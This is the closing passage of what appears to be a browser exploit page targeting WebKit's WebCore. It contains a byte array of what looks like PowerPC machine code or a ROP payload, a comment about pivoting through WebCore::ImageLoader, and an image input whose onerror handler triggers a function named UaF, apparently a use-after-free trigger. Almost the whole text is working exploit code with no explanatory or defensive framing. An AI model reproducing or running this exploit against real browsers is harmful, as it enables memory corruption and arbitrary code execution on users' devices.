0x00, 0x7c, 0x91, 0x41, 0x00, 0xc4, 0x91, 0x41, 0x01, 0x0c, 0x91, 0x41, 0x01, 0x54, 0x3d, 0x40, 0x01, 0x80, 0x91, 0x41, 0x00, 0x6c, 0x91, 0x41, 0x00, 0xfc, 0x91, 0x41, 0x01, 0x44, 0x91, 0x41, 0x01, 0x5c, 0x90, 0xe1, 0x00, 0x74, 0x91, 0x61, 0x00, 0x5c, 0x91, 0x61, 0x01, 0x04, 0x91, 0x61, 0x01, 0x4c, 0x80, 0x01, 0x00, 0x04, 0x7c, 0x08, 0x03, 0xa6, 0x4e, 0x80, 0x00, 0x20, 0x4e, 0x80, 0x00, 0x20,
|
||
|
]
|
||
|
);
|
||
|
}
|
||
|
|
||
|
|
||
|
alert("verify...");
|
||
|
|
||
|
//Use the new WebCore::ImageLoader & pivot !
|
||
|
return 0;
|
||
|
}
|
||
|
</script>
|
||
|
|
||
|
<input id="x" type="image" onerror="UaF(this);" src=""/>
|